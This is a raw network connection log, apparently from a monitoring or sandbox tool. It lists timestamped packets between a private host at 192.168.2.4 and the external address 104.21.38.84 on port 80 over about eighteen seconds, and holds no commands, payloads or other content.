Jan 1, 2025 14:52:56.655000925 CET	80	49827	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:56.655055046 CET	49827	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:56.655448914 CET	80	49833	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:56.655507088 CET	49833	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:56.655623913 CET	49833	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:56.660351992 CET	80	49833	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:57.011529922 CET	49833	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:57.016355991 CET	80	49833	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:57.120121002 CET	80	49833	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:57.167656898 CET	49833	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:57.376836061 CET	80	49833	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:57.417659998 CET	49833	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:57.488213062 CET	49833	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:57.488799095 CET	49839	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:57.493176937 CET	80	49833	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:57.493231058 CET	49833	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:57.493639946 CET	80	49839	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:57.493695974 CET	49839	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:57.493779898 CET	49839	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:57.498598099 CET	80	49839	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:57.839742899 CET	49839	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:57.844701052 CET	80	49839	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:57.947257042 CET	80	49839	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:57.995800018 CET	49839	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:58.117566109 CET	80	49839	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:58.167709112 CET	49839	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:58.240931988 CET	49839	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:58.241615057 CET	49845	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:58.245899916 CET	80	49839	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:58.246117115 CET	49839	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:58.246553898 CET	80	49845	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:58.246634007 CET	49845	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:58.246815920 CET	49845	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:58.251610994 CET	80	49845	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:58.605243921 CET	49845	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:58.610202074 CET	80	49845	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:58.694487095 CET	80	49845	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:58.745800972 CET	49845	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:58.954049110 CET	80	49845	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:58.995794058 CET	49845	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.101969004 CET	49845	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.107047081 CET	80	49845	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:59.108761072 CET	49845	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.111481905 CET	49855	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.116302013 CET	80	49855	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:59.116374016 CET	49855	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.117568016 CET	49855	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.122323036 CET	80	49855	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:59.502351046 CET	49855	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.507389069 CET	80	49855	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:59.590369940 CET	80	49855	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:59.636437893 CET	49855	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.670171976 CET	49855	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.670376062 CET	49857	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.675205946 CET	80	49857	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:59.675220966 CET	80	49855	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:59.675287008 CET	49855	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.675299883 CET	49857	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.675390005 CET	49857	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.680111885 CET	80	49857	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:59.789305925 CET	49858	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.794181108 CET	80	49858	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:59.794265032 CET	49858	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.795131922 CET	49858	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:59.799941063 CET	80	49858	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:00.027266979 CET	49857	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.032274008 CET	80	49857	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:00.032378912 CET	80	49857	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:00.119092941 CET	80	49857	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:00.152175903 CET	49858	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.157032013 CET	80	49858	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:00.167687893 CET	49857	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.242429018 CET	80	49858	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:00.283760071 CET	80	49857	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:00.292762995 CET	49858	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.323951006 CET	49857	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.417859077 CET	80	49858	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:00.464557886 CET	49858	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.539190054 CET	49857	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.540122986 CET	49858	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.540122986 CET	49864	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.544296980 CET	80	49857	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:00.544451952 CET	49857	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.545022011 CET	80	49864	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:00.545113087 CET	49864	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.545177937 CET	80	49858	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:00.545233011 CET	49858	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.545312881 CET	49864	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.550090075 CET	80	49864	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:00.902198076 CET	49864	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:00.907279968 CET	80	49864	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:01.042879105 CET	80	49864	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:01.089612961 CET	49864	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:01.250606060 CET	80	49864	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:01.292921066 CET	49864	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:01.367923975 CET	49871	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:01.372932911 CET	80	49871	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:01.373011112 CET	49871	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:01.373091936 CET	49871	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:01.377940893 CET	80	49871	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:01.730480909 CET	49871	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:01.735694885 CET	80	49871	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:01.869383097 CET	80	49871	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:01.917717934 CET	49871	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:02.200321913 CET	80	49871	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:02.245815992 CET	49871	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:02.503820896 CET	49871	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:02.504699945 CET	49879	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:02.508959055 CET	80	49871	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:02.509027958 CET	49871	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:02.509519100 CET	80	49879	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:02.509577990 CET	49879	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:02.522223949 CET	49879	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:02.527198076 CET	80	49879	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:02.870881081 CET	49879	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:02.875760078 CET	80	49879	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:02.981760979 CET	80	49879	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:03.027081966 CET	49879	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:03.178299904 CET	80	49879	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:03.230335951 CET	49879	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:03.303900957 CET	49879	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:03.304594994 CET	49884	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:03.309156895 CET	80	49879	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:03.309384108 CET	49879	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:03.309736013 CET	80	49884	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:03.309794903 CET	49884	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:03.310058117 CET	49884	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:03.314836025 CET	80	49884	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:03.668241978 CET	49884	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:03.673154116 CET	80	49884	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:03.753956079 CET	80	49884	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:03.808332920 CET	49884	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:04.063038111 CET	80	49884	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:04.120863914 CET	49884	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:04.176742077 CET	49884	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:04.177321911 CET	49889	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:04.182101011 CET	80	49884	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:04.182230949 CET	80	49889	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:04.182261944 CET	49884	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:04.182308912 CET	49889	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:04.182439089 CET	49889	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:04.187340021 CET	80	49889	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:04.527276039 CET	49889	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:04.532217979 CET	80	49889	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:04.646281958 CET	80	49889	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:04.694961071 CET	49889	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:04.815267086 CET	80	49889	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:04.855204105 CET	49889	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.155637980 CET	49864	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.159816980 CET	49889	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.161204100 CET	49896	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.165043116 CET	80	49889	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:05.165090084 CET	49889	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.166115999 CET	80	49896	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:05.166234970 CET	49896	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.166491032 CET	49896	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.367023945 CET	80	49896	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:05.512080908 CET	49896	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.517838955 CET	80	49896	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:05.525821924 CET	49897	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.525991917 CET	49896	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.530685902 CET	80	49897	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:05.531251907 CET	49897	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.531423092 CET	49897	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.536326885 CET	80	49897	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:05.577857018 CET	80	49896	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:05.692560911 CET	49902	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.697360992 CET	80	49902	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:05.697448015 CET	49902	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.697575092 CET	49902	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.702313900 CET	80	49902	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:05.726469994 CET	80	49896	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:05.726546049 CET	49896	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.886569023 CET	49897	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:05.891573906 CET	80	49897	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:05.891628981 CET	80	49897	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:06.000952005 CET	80	49897	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:06.042821884 CET	49902	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.047677040 CET	80	49902	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:06.058350086 CET	49897	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.160497904 CET	80	49902	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:06.180035114 CET	80	49897	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:06.214591026 CET	49902	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.230215073 CET	49897	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.270431995 CET	80	49897	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:06.323971987 CET	49897	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.416774988 CET	80	49902	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:06.464591980 CET	49902	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.535425901 CET	49897	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.536062002 CET	49902	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.536065102 CET	49908	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.540458918 CET	80	49897	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:06.540949106 CET	80	49908	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:06.541033983 CET	49897	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.541064024 CET	49908	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.541083097 CET	80	49902	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:06.541136980 CET	49902	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.541202068 CET	49908	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.546017885 CET	80	49908	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:06.886646032 CET	49908	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:06.891576052 CET	80	49908	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:07.004755974 CET	80	49908	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:07.058347940 CET	49908	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:07.271003008 CET	80	49908	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:07.324055910 CET	49908	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:07.405596972 CET	49914	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:07.410492897 CET	80	49914	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:07.410558939 CET	49914	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:07.410691023 CET	49914	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:07.415515900 CET	80	49914	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:07.761712074 CET	49914	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:07.766650915 CET	80	49914	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:07.882718086 CET	80	49914	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:07.943500996 CET	49914	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:08.150784016 CET	80	49914	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:08.205220938 CET	49914	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:08.402494907 CET	49908	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:08.418641090 CET	49914	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:08.419280052 CET	49921	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:08.424042940 CET	80	49914	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:08.424101114 CET	49914	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:08.424176931 CET	80	49921	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:08.424233913 CET	49921	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:08.424881935 CET	49921	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:08.429685116 CET	80	49921	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:08.777205944 CET	49921	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:08.782067060 CET	80	49921	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:08.873054028 CET	80	49921	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:08.917726040 CET	49921	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:09.134896994 CET	80	49921	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:09.183630943 CET	49921	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:09.253567934 CET	49921	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:09.254085064 CET	49927	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:09.258692980 CET	80	49921	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:09.258769989 CET	49921	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:09.258900881 CET	80	49927	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:09.258972883 CET	49927	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:09.259058952 CET	49927	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:09.263938904 CET	80	49927	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:09.605319977 CET	49927	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:09.610143900 CET	80	49927	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:09.708282948 CET	80	49927	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:09.761483908 CET	49927	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:09.889786959 CET	80	49927	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:09.933363914 CET	49927	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.004806995 CET	49927	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.005451918 CET	49933	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.009999990 CET	80	49927	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:10.010350943 CET	80	49933	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:10.010415077 CET	49927	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.010449886 CET	49933	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.010606050 CET	49933	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.015448093 CET	80	49933	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:10.355782986 CET	49933	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.360692978 CET	80	49933	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:10.463035107 CET	80	49933	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:10.511497974 CET	49933	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.645745993 CET	80	49933	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:10.699014902 CET	49933	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.980034113 CET	49933	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.980992079 CET	49940	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.985136032 CET	80	49933	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:10.985187054 CET	49933	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.985867023 CET	80	49940	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:10.985922098 CET	49940	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.986078024 CET	49940	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:10.990885973 CET	80	49940	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.278047085 CET	49940	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:11.278675079 CET	49944	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:11.283515930 CET	80	49944	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.283591986 CET	49944	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:11.283698082 CET	49944	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:11.288516045 CET	80	49944	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.325833082 CET	80	49940	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.350601912 CET	80	49940	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.350645065 CET	49940	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:11.395467997 CET	49946	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:11.400244951 CET	80	49946	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.400340080 CET	49946	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:11.400451899 CET	49946	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:11.405210972 CET	80	49946	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.636672974 CET	49944	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:11.641581059 CET	80	49944	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.641674042 CET	80	49944	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.731230021 CET	80	49944	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.746112108 CET	49946	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:11.750945091 CET	80	49946	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.777134895 CET	49944	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:11.847465992 CET	80	49946	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.902261019 CET	49946	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:11.914792061 CET	80	49944	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:11.964636087 CET	49944	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:12.111871004 CET	80	49946	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:12.152667999 CET	49946	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:12.222296000 CET	49946	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:12.222296000 CET	49944	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:12.222946882 CET	49952	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:12.227355003 CET	80	49946	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:12.227478981 CET	49946	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:12.227622986 CET	80	49944	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:12.227792978 CET	80	49952	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:12.227844000 CET	49944	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:12.227873087 CET	49952	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:12.227947950 CET	49952	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:12.232734919 CET	80	49952	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:12.574110031 CET	49952	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:12.579046965 CET	80	49952	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:12.676281929 CET	80	49952	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:12.730287075 CET	49952	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:12.947933912 CET	80	49952	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:12.995896101 CET	49952	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.067511082 CET	49958	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.072463989 CET	80	49958	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:13.072654009 CET	49958	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.072679043 CET	49958	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.077588081 CET	80	49958	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:13.419900894 CET	49958	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.424779892 CET	80	49958	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:13.537457943 CET	80	49958	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:13.589649916 CET	49958	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.793407917 CET	80	49958	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:13.839652061 CET	49958	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.966342926 CET	49952	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.970268965 CET	49958	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.971255064 CET	49964	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.975192070 CET	80	49958	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:13.975239992 CET	49958	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.976094961 CET	80	49964	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:13.976150036 CET	49964	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.976294994 CET	49964	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:13.981044054 CET	80	49964	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:14.324165106 CET	49964	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:14.329011917 CET	80	49964	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:14.428893089 CET	80	49964	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:14.480367899 CET	49964	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:14.694446087 CET	80	49964	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:14.745910883 CET	49964	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:14.822107077 CET	49964	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:14.822841883 CET	49971	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:14.827110052 CET	80	49964	104.21.38.84	192.168.2.4
